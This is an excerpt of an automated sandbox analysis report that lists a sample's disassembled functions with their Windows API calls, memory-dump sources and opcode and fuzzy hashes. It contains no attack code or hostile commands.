                                                                                          • Opcode Fuzzy Hash: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                                          • Instruction Fuzzy Hash: A2313A3270AB869AEB208F21D8943E967A4FB8DB85F544175DA4D87744DF3CD645C700
                                                                                          Function 00007FF6A0E87CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1617791916-0
                                                                                          • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                          • Instruction ID: cc6ea7d77a61bb5b3536e3744e6c404386ad84369c905968871c47549abbbe5e
                                                                                          • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                          • Instruction Fuzzy Hash: 5521DD7170AB4396EA049B51A54007ABBA1FF8EFD1B549130DE5E83795DF3CE0059700
                                                                                          Function 00007FF6A0E76A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E83C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6A0E83D0C
                                                                                            • Part of subcall function 00007FF6A0E83C24: towupper.MSVCRT ref: 00007FF6A0E83D2F
                                                                                            • Part of subcall function 00007FF6A0E83C24: iswalpha.MSVCRT ref: 00007FF6A0E83D4F
                                                                                            • Part of subcall function 00007FF6A0E83C24: towupper.MSVCRT ref: 00007FF6A0E83D75
                                                                                            • Part of subcall function 00007FF6A0E83C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E83DBF
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E9EA0F,?,?,?,00007FF6A0E9E925,?,?,?,?,00007FF6A0E7B9B1), ref: 00007FF6A0E76ABF
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E76AD3
                                                                                            • Part of subcall function 00007FF6A0E76B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF6A0E76AE8,?,?,?,00007FF6A0E9EA0F,?,?,?,00007FF6A0E9E925), ref: 00007FF6A0E76B8B
                                                                                            • Part of subcall function 00007FF6A0E76B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF6A0E76AE8,?,?,?,00007FF6A0E9EA0F,?,?,?,00007FF6A0E9E925), ref: 00007FF6A0E76B97
                                                                                            • Part of subcall function 00007FF6A0E76B84: RtlFreeHeap.NTDLL ref: 00007FF6A0E76BAF
                                                                                            • Part of subcall function 00007FF6A0E76B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E76AF1,?,?,?,00007FF6A0E9EA0F,?,?,?,00007FF6A0E9E925), ref: 00007FF6A0E76B39
                                                                                            • Part of subcall function 00007FF6A0E76B30: RtlFreeHeap.NTDLL ref: 00007FF6A0E76B4D
                                                                                            • Part of subcall function 00007FF6A0E76B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E76AF1,?,?,?,00007FF6A0E9EA0F,?,?,?,00007FF6A0E9E925), ref: 00007FF6A0E76B59
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E9EA0F,?,?,?,00007FF6A0E9E925,?,?,?,?,00007FF6A0E7B9B1), ref: 00007FF6A0E76B03
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E76B17
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                          • String ID:
                                                                                          • API String ID: 3512109576-0
                                                                                          • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                          • Instruction ID: 03fe9648fcd9b94c31b6e5a90b2f978b748607206b6edf46085d4d7c050d86c7
                                                                                          • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                          • Instruction Fuzzy Hash: 91216272D0AA8395EB049B65D4543B8BBA0FF5AB49F148036DA0EC7352DF3CA445E350
                                                                                          Function 00007FF6A0E7B6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7AF82), ref: 00007FF6A0E7B6D0
                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7AF82), ref: 00007FF6A0E7B6E7
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7AF82), ref: 00007FF6A0E7B701
                                                                                          • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7AF82), ref: 00007FF6A0E7B715
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$AllocSize
                                                                                          • String ID:
                                                                                          • API String ID: 2549470565-0
                                                                                          • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                          • Instruction ID: b1c90ee28b2c8d5c9674aad83d263d30b1db9b663b6f42f76ac29262d6c5afa0
                                                                                          • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                          • Instruction Fuzzy Hash: 29216672A0B783E6EA588B51E540179B6B1FF89B80B58D532EA0E83755DF3CE445E300
                                                                                          Function 00007FF6A0E9CFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6A0E8507A), ref: 00007FF6A0E9D01C
                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6A0E8507A), ref: 00007FF6A0E9D033
                                                                                          • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6A0E8507A), ref: 00007FF6A0E9D06D
                                                                                          • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6A0E8507A), ref: 00007FF6A0E9D07F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                          • String ID:
                                                                                          • API String ID: 1033415088-0
                                                                                          • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                          • Instruction ID: 68e5de4557df5891212b10675d73529c22914400ca3dfda8703fe8d789f83bbb
                                                                                          • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                          • Instruction Fuzzy Hash: 40116D3161DA8296EA448B24F0541BABBE1FB8EB95F505135FA8E87B94DF3CD0459B00
                                                                                          Function 00007FF6A0E759E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E81EA0: wcschr.MSVCRT(?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6A0EA0D54), ref: 00007FF6A0E81EB3
                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E75A2E
                                                                                          • _open_osfhandle.MSVCRT ref: 00007FF6A0E75A4F
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF6A0E7260D), ref: 00007FF6A0E937AA
                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF6A0E937D2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                          • String ID:
                                                                                          • API String ID: 22757656-0
                                                                                          • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                          • Instruction ID: e84dd46319411e3f8c536e4a56e9bab855937b585c6485bd26942bce53296f20
                                                                                          • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                          • Instruction Fuzzy Hash: FF119472A1564697E7108B24E44833DBAA0FB89B75F644734E62E873D5CF3CD4499B00
                                                                                          Function 00007FF6A0E89158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                          • String ID:
                                                                                          • API String ID: 140117192-0
                                                                                          • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                          • Instruction ID: de7341eaff294e0fa4b986d100db65a47f8d58b4a410fc43f059cbba3fc9c882
                                                                                          • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                          • Instruction Fuzzy Hash: CC21A23591EB46A6EB408B04F8843A977B4FB89755F600035EA8EC2764DF7DE448D710
                                                                                          Function 00007FF6A0E95690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF6A0E95433,?,?,?,00007FF6A0E969B8,?,?,?,?,?,00007FF6A0E88C39), ref: 00007FF6A0E956C5
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E956D9
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF6A0E95433,?,?,?,00007FF6A0E969B8,?,?,?,?,?,00007FF6A0E88C39), ref: 00007FF6A0E956FD
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E95711
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$FreeProcess
                                                                                          • String ID:
                                                                                          • API String ID: 3859560861-0
                                                                                          • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                          • Instruction ID: e25cef4678ad19850906aa53acf459895ec0a3b19f253437b2a05e0b61fbbdf8
                                                                                          • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                          • Instruction Fuzzy Hash: 97111C72A05B91D6DB108F66E4440ADFBB0F74DF85B998125EB4E43718DF38E456C740
                                                                                          Function 00007FF6A0E84AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E78798), ref: 00007FF6A0E84AD6
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E78798), ref: 00007FF6A0E84AEF
                                                                                            • Part of subcall function 00007FF6A0E84A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A28
                                                                                            • Part of subcall function 00007FF6A0E84A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A66
                                                                                            • Part of subcall function 00007FF6A0E84A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A7D
                                                                                            • Part of subcall function 00007FF6A0E84A14: memmove.MSVCRT(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A9A
                                                                                            • Part of subcall function 00007FF6A0E84A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84AA2
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E78798), ref: 00007FF6A0E8EE64
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E8EE78
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                                          • String ID:
                                                                                          • API String ID: 2759988882-0
                                                                                          • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                          • Instruction ID: 54046a3040238906ee25e717ca43a8250875ec41ed54866fb758e8dec0f95cd8
                                                                                          • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                          • Instruction Fuzzy Hash: 9AF06DB0A0AB83E6EF149B769414179A9E1FF8EB42B588474DD0EC2351EE3CA4089310
                                                                                          Function 00007FF6A0E9F22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                          • String ID:
                                                                                          • API String ID: 1606018815-0
                                                                                          • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                          • Instruction ID: c3dded3544f514608084aaf374009de46997bbcac01cabbbcdba41e8799c34af
                                                                                          • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                          • Instruction Fuzzy Hash: 08F03035A26A43EBD7045B20E844279FAB0FB8EB13F959234EA0F42394DF3CD4088B00
                                                                                          Function 00007FF6A0E7E420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806D6
                                                                                            • Part of subcall function 00007FF6A0E806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806F0
                                                                                            • Part of subcall function 00007FF6A0E806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E8074D
                                                                                            • Part of subcall function 00007FF6A0E806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E80762
                                                                                            • Part of subcall function 00007FF6A0E7EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F000
                                                                                            • Part of subcall function 00007FF6A0E7EF40: wcschr.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F031
                                                                                            • Part of subcall function 00007FF6A0E7EF40: iswdigit.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F0D6
                                                                                          • longjmp.MSVCRT ref: 00007FF6A0E8CCBC
                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E8CCE0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                          • API String ID: 3282654869-1994581435
                                                                                          • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                          • Instruction ID: a160f4b40163eca98071c2a2f40f78207f731ffcbdbfbddcb0bf0b27176f3da9
                                                                                          • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                          • Instruction Fuzzy Hash: C161E572F0B747A2FA149B21946427963A1FF497A8F544635CA1D877E2EE3CF444E300
                                                                                          Function 00007FF6A0EA10D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                            • Part of subcall function 00007FF6A0E7CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF6A0E9827A), ref: 00007FF6A0EA11DC
                                                                                          • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF6A0E9827A), ref: 00007FF6A0EA1277
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcessmemmovewcschr
                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                          • API String ID: 1135967885-381716982
                                                                                          • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
